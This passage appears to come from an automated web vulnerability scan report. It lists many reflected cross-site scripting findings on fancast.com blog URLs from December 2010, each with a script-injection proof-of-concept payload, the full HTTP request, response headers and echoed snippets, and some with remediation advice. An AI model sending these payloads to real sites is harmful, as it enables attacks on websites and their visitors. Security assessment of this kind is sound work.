The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68246</script><script>alert(1)</script>65e10340d27 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news68246</script><script>alert(1)</script>65e10340d27/jersey-shores-ronnie-indicted-on-assault-charge/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:54 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:54 GMT Content-Length: 34854
2.468. http://www.fancast.com/blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb782</script><script>alert(1)</script>221644df2a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/?eb782</script><script>alert(1)</script>221644df2a7=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:50 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:50 GMT Content-Length: 34869
2.469. http://www.fancast.com/blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3feb7"><script>alert(1)</script>89ab2476a96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3feb7\"><script>alert(1)</script>89ab2476a96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/?3feb7"><script>alert(1)</script>89ab2476a96=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:46 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:46 GMT Content-Length: 34839
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0df6</script><script>alert(1)</script>b5f2cdde909 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-newsf0df6</script><script>alert(1)</script>b5f2cdde909/late-night-foes-ferguson-and-fallon-swap-gifts/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:20:00 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:25:00 GMT Content-Length: 37432
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdccd"><script>alert(1)</script>0bf982dc15 was submitted in the REST URL parameter 3. This input was echoed as fdccd\"><script>alert(1)</script>0bf982dc15 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-newsfdccd"><script>alert(1)</script>0bf982dc15/late-night-foes-ferguson-and-fallon-swap-gifts/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:56 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:56 GMT Content-Length: 37397
2.472. http://www.fancast.com/blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5a79</script><script>alert(1)</script>5e476fe08b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/?a5a79</script><script>alert(1)</script>5e476fe08b=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:55 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:55 GMT Content-Length: 37442
2.473. http://www.fancast.com/blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fddae"><script>alert(1)</script>dc4db8d140b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fddae\"><script>alert(1)</script>dc4db8d140b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/?fddae"><script>alert(1)</script>dc4db8d140b=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:50 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:50 GMT Content-Length: 37417
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12788"><script>alert(1)</script>81a5cc71d84 was submitted in the REST URL parameter 3. This input was echoed as 12788\"><script>alert(1)</script>81a5cc71d84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news12788"><script>alert(1)</script>81a5cc71d84/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:55 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:55 GMT Content-Length: 38324
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Letterman's Top Ten Things Overh ...[SNIP]... <meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news12788\"><script>alert(1)</script>81a5cc71d84/lettermans-top-ten-things-overheard-on-larry-kings-final-show/"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35f54</script><script>alert(1)</script>ac1546956da was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news35f54</script><script>alert(1)</script>ac1546956da/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:58 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:58 GMT Content-Length: 38354
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Letterman's Top Ten Things Overh ...[SNIP]... <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news35f54</script><script>alert(1)</script>ac1546956da/lettermans-top-ten-things-overheard-on-larry-kings-final-show/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency= ...[SNIP]...
2.476. http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ba7d</script><script>alert(1)</script>bcd2e455558 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/?7ba7d</script><script>alert(1)</script>bcd2e455558=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:54 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:54 GMT Content-Length: 38369
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Letterman's Top Ten Things Overh ...[SNIP]... <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/?7ba7d</script><script>alert(1)</script>bcd2e455558=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig ...[SNIP]...
2.477. http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e4b"><script>alert(1)</script>9ea6fd3928a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1e4b\"><script>alert(1)</script>9ea6fd3928a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/?b1e4b"><script>alert(1)</script>9ea6fd3928a=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:50 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:50 GMT Content-Length: 38339
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Letterman's Top Ten Things Overh ...[SNIP]... <meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/?b1e4b\"><script>alert(1)</script>9ea6fd3928a=1"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1b1c</script><script>alert(1)</script>e02b396ef72 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-newsb1b1c</script><script>alert(1)</script>e02b396ef72/neil-patrick-harris-slams-eric-braeden-for-bailing/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:26 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:25 GMT Content-Length: 41792
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Neil Patrick Harris Slams Eric B ...[SNIP]... <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-newsb1b1c</script><script>alert(1)</script>e02b396ef72/neil-patrick-harris-slams-eric-braeden-for-bailing/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" styl ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbc24"><script>alert(1)</script>235e6ac552d was submitted in the REST URL parameter 3. This input was echoed as dbc24\"><script>alert(1)</script>235e6ac552d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-newsdbc24"><script>alert(1)</script>235e6ac552d/neil-patrick-harris-slams-eric-braeden-for-bailing/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:20 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:20 GMT Content-Length: 41762
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Neil Patrick Harris Slams Eric B ...[SNIP]... <meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-newsdbc24\"><script>alert(1)</script>235e6ac552d/neil-patrick-harris-slams-eric-braeden-for-bailing/"/> ...[SNIP]...
2.480. http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eadf3</script><script>alert(1)</script>e2c125fe16a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/?eadf3</script><script>alert(1)</script>e2c125fe16a=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:18 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:18 GMT Content-Length: 41807
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Neil Patrick Harris Slams Eric B ...[SNIP]... <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/?eadf3</script><script>alert(1)</script>e2c125fe16a=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig ...[SNIP]...
2.481. http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22fc4"><script>alert(1)</script>9417ce6fc04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 22fc4\"><script>alert(1)</script>9417ce6fc04 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/?22fc4"><script>alert(1)</script>9417ce6fc04=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:11 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:11 GMT Content-Length: 41777
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Neil Patrick Harris Slams Eric B ...[SNIP]... <meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/?22fc4\"><script>alert(1)</script>9417ce6fc04=1"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71465"><script>alert(1)</script>ef9d0053dc2 was submitted in the REST URL parameter 3. This input was echoed as 71465\"><script>alert(1)</script>ef9d0053dc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news71465"><script>alert(1)</script>ef9d0053dc2/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:19 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:19 GMT Content-Length: 35668
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Olbermann Attacked on Twitter, C ...[SNIP]... <meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news71465\"><script>alert(1)</script>ef9d0053dc2/olbermann-attacked-on-twitter-calls-oreilly-the-worst/"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41287</script><script>alert(1)</script>a27fdf1cd23 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news41287</script><script>alert(1)</script>a27fdf1cd23/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:24 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:24 GMT Content-Length: 35698
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Olbermann Attacked on Twitter, C ...[SNIP]... <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news41287</script><script>alert(1)</script>a27fdf1cd23/olbermann-attacked-on-twitter-calls-oreilly-the-worst/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" s ...[SNIP]...
2.484. http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5670</script><script>alert(1)</script>d05cc34a44a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/?a5670</script><script>alert(1)</script>d05cc34a44a=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:18 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:17 GMT Content-Length: 35713
2.485. http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60714"><script>alert(1)</script>09bbc717872 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60714\"><script>alert(1)</script>09bbc717872 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/?60714"><script>alert(1)</script>09bbc717872=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:11 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:11 GMT Content-Length: 35683
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Olbermann Attacked on Twitter, C ...[SNIP]... <meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/?60714\"><script>alert(1)</script>09bbc717872=1"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1276"><script>alert(1)</script>51691943018 was submitted in the REST URL parameter 3. This input was echoed as c1276\"><script>alert(1)</script>51691943018 in the application's response.
